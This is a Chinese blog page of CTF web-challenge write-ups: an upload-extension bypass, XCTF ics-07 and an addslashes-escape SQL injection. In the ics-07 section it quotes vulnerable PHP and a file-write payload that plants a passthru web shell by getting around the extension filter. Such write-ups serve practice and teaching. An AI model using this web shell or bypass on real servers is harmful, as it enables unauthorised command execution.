web

最新推荐文章于 2023-05-18 23:04:05 发布
最新推荐文章于 2023-05-18 23:04:05 发布
阅读量230 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43940853/article/details/100651394
版权

在这里插入图片描述
在这里插入图片描述
将flag的内容二次解码得到19295,post上去
在这里插入图片描述
写脚本
在这里插入图片描述
访问路径后,得到
在这里插入图片描述

在这里插入图片描述
得到验证码,这道题还有一个svn源码泄露
在这里插入图片描述
解密后访问http://9bc680b7ccdc46e385a74d53c50b3f5433924cf948764f31.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/7815696ecbf1c96e6894b779456d330e.php
得到一个文件上传的页面,直接上传一个pht文件后缀的文件(注意一些常用文件后缀的改写)

攻防世界(ics-07)
点进项目管理,查看源代码

 <!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>cetc7</title>
  </head>
  <body>
    <?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>

    <form action="#" method="get">
      page : <input type="text" name="page" value="">
      id : <input type="text" name="id" value="">
      <input type="submit" name="submit" value="submit">
    </form>
    <br />
    <a href="index.phps">view-source</a>

    <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

    <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

  </body>
</html>

将源代码整理后大致是这样的情况,注意这个正则匹配,匹配的是所有.中出现的最后一个点
构造file=…/123.php/1.php/…&con=<?php passthru($_GET[bash]);?>
(注意先post提交一下bash这个参数,不能同时提交post和get,会提示路径不存在)
在这里插入图片描述
两种提交方式的顺序要搞清,最看查看源代码,得到flag

i春秋(vld)
在这里插入图片描述
上来先根据提示审计源码
在这里插入图片描述
观察这一部分代码,猜测这里需要传入3个参数,flag1,flag2,flag3
在这里插入图片描述
根据提示,下载源码
login.php
在这里插入图片描述
可能存在注入
在这里插入图片描述

对username进行了预处理,‘会被转义成’/’,这里利用一个知识点,%00会被addslashes函数转义为\0,当我们的number输入0,username输入1%00’,经过addslashes处理后,将会变成1\’,实现字符串逃逸,注意这里的number的值很关键,起到替换作用,接下来就可以进行注入了
在这里插入图片描述
我先是用常规的报错注入试了一下,发现报错信息,这还是第一次见
在这里插入图片描述
后来把0x7e改成任意数字发现便能成功,知道数据库名称是ctf,接下来查询数据表

在这里插入图片描述
因为进行了转义,所以我把ctf进行了16进制编码,依然不行,平常这样的就过了,换一种方式吧
在这里插入图片描述
以前都是直接用数据库名称的,记住这种方法
在这里插入图片描述
这里没想到查询列也能这样使用,不知道对所有查询适不适用,懒得测了,碰到再说
在这里插入图片描述
显示不全,这里我用的是substr函数进行筛选,过程贼麻烦,不过最后还是试出来了,flag一旦超过或小于它的范围之后均会异常耐心点

WuT0ng
关注
菜鸟慢慢爬行-----web(5)
weixin_44897902的博客
09-08 820
攻防世界 ics-07 一个管理系统,和之前做过的一道有点像,但是又不一样; 随便点击,发现这道题目已经将该修复的修复了 仍然随便点击,点到项目管理,得到第一个提示:查看源码,然后发现view-source.php 访问得到源码,如下: <!DOCTYPE html> <html> <head> <meta charset="utf-8"&g...
CTF【解密】字符串flag被加密成已知新字符串,请解密出flag,可以使用Python解码出WriteUp
星如雨落
03-06 9888
CTF-解密: 找出flag task.py # -*- coding: utf-8 -*- assert flag[0:5] == 'flag{' strAlphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' def encode(strOld, x, y, n): strNew = '' for i in strOld: if i in strAlphabet:
CTF解题
m0_74097148的博客
11-29 1192
第三题:点击链接后一脸懵,但我看到题目提示肯定用php,于是我加了后缀index.php发现没啥变化,于是就不会了,看了一些大佬的提示,有的是扫目录或者是不断在php后面加后缀,于是得到了index.phps发现出现了一些代码,查看网页源代码进行审计。该代码的意思时不能将id的值通过get传给admin,但必须让admin等于get传值,又由于传得值会经过url解码,(我又得知浏览器会对写入的东西进行一次url解码),因此必须传值的时候进行两次url编码才可以,即对admin进行两次url编码即可。
BUUCTF-Crypto部分题解-1
一个学习网安的鸡翅
05-16 2506
今天刚刚学了点密码学的知识,于是开始浅浅刷一下Crypto的题库吧。 不太温馨的小提示: 做这类题目的时候,最好要准备好工具。俗话说的好,工欲善其事必先利其器。一款好用的工具能极大地提高效率。这里推荐使用CaptfEncoder工具,然后资源的话,你是在c站啊,你搜索一下,有一大堆大佬已经发出来了,这里就不赘述了。 1.MD5: MD5 1 注意:得到的 flag 请包上 flag{} 提交 这题没什么好说的,直接找MD5破解网站就行了。提交 的时候记得注意一下提交格式哦! 知...
题目讲解3
aetlypdlg_ys的博客
05-18 518
id等于这玩意儿是因为$_SESSION['tokennum']没有什么东西,就直接让id=md5($_SESSION['tokennum'])就行,d41d8cd98f00b204e9800998ecf8427e这一串就是$_SESSION['tokennum']的md5加密。potin1k就是绕过addslashes,构造查看ae86qfC.php的内容。1{${highlight_file( 中的1是为了满足 if (intval,只要是数字开头的字符串就会返回数字,如果是纯字符串返回0。
Web设计购物网站程序源码下载
06-05
Web设计购物网站程序源码是开发在线电子商务平台的基础,它涉及到多个技术和概念。在这个项目中,我们使用Eclipse作为集成开发环境(IDE)来编写和管理源代码。Eclipse是一款强大的开源工具,广泛用于Java应用的开发...
ue webUI 5.3版本的插件 支持打包
12-26
在IT行业中,WebUI是用户界面的Web版本,它与用户进行交互,提供可视化的操作界面。UE(User Experience)通常指的是用户在使用产品或服务时的主观感受和交互效果。随着技术的发展,WebUI的设计和开发变得越来越复杂...
Python学生管理系统(web网页版)
11-02
Python学生管理系统(web网页版),前面发布了python的控制台版本的学生管理系统和使用tkinter界面版的学生管理系统,这次是使用Django开发基于学生的实体类的增删改查,里面包含项目演示录屏和完整的项目源码与...
web前端网页设计作品web期末大作业web前端作业网页制作代码web大作业制作网页代码
07-10
本资源就可以为你解决你所面临的这些问题,原始HTML+CSS+JS页面设计, web大学生网页设计作业源码,这是一个不错的网页制作资源合集,画面精美,非常适合初学者学习使用。 多套(HTML+CSS+JS)网页设计的学生期末大...
web网页制作期末大作业
11-17
总的来说,这个"web网页制作期末大作业"旨在考察学生对Web前端基础知识的掌握程度,以及实际应用这些知识解决问题的能力。通过这个项目,学生不仅能提升技术技能,还能培养良好的项目管理和团队协作习惯。
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4619
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
php 操作系统之间的一些黑魔法(绕过文件上传a.php/.)
3569
01-02 7709
http://wonderkun.cc/index.html/?p=6260x00 前言做了一个CTF题目,遇到了一些有趣的东西,所以写了这篇文章记录了一下。 但是我却不明白造成这个问题的原因在哪里,所以不知道给文章起什么标题,就姑且叫这个非常宽泛的名字吧。0x01 CTF题目原型在遇到的题目中,最后一步是getshell,大概可以简化为以下代码: // 测试环境 linux + apache2
攻防世界(web高手进阶区)——21~31题
weixin_43610673的博客
04-11 3150
FlatScience 点开的页面中的链接都是下载pdf文件的,都是英文论文什么的,先不管 测试/.git/,回显404,但有robots.txt 两个登录界面,猜测flag应该是登录admin.php拿到,通过对login.php进行注入得到密码。 login.php源码注释有提示 访问/login.php?debug,得到源码 是个sqlite的数据库,密码通过sha1加密还加了sa...
攻防世界——web高手进阶区题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
攻防世界练习题web
果果的csdn
06-12 1160
虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。 工控云管理系统项目管理页面解析漏洞 打开题目,读到源码,进行审计。 <?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'conf...
攻防世界web基础题笔记
qq_51352283的博客
06-13 713
网安小白做题攻防世界web基础题笔记心得
攻防世界-ics-07
读万卷书,行万里路。
12-29 150
文章目录1 源码审计2 php弱类型3 php上传后缀绕过 1 源码审计 打开网站进行体验过后,发现在「项目管理」位置可以点击,进入后可以查看该网页的源码。使用F12后并无其他异常情况。使用 dirsearch进行扫目录 [10:11:59] 302 - 1KB - /index.php -> ?page=flag.php [10:11:59] 200 - 74B - /flag.php [10:11:59] 200 - 0B - /config.php [10:11:59]
PHP执行系统外部命令函数:exec()、passthru()、system()、shell_exec()
weixin_30902251的博客
08-19 284
php提供4种方法执行系统外部命令:exec()、passthru()、system()、 shell_exec()。在开始介绍前,先检查下php配置文件php.ini中是有禁止这是个函数。找到 disable_functions,配置如下: disable_functions = 如果“disable_functions=”后面有接上面四个函数,将其删除。默认php.ini配置...
【水果识别】基于matlab GUI形态学水果大小识别【含Matlab源码 920期】.md
最新发布
10-15
CSDN Matlab武动乾坤上传的资料均有对应的代码代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像识别:表盘识别、车道线识别、车牌识别、答题卡识别、电器识别、跌倒检测、动物识别、发票识别、服装识别、汉字识别、红绿灯识别、火灾检测、疾病分类、交通标志牌识别、口罩识别、裂缝识别、目标跟踪、疲劳检测、身份证识别、人民币识别、数字字母识别、手势识别、树叶识别、水果分级、条形码识别、瑕疵检测、芯片识别、指纹识别
Web安全:Web架构与Web2.0时代的挑战
Web安全是现代互联网环境中一个至关重要的议题,尤其是在Web服务日益普及和Web2.0技术推动下。Web架构,即基于B/S(浏览器/服务器)模式,通过HTTP协议进行服务提供,最初由于开发简便和部署简易而迅速风靡。随着Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值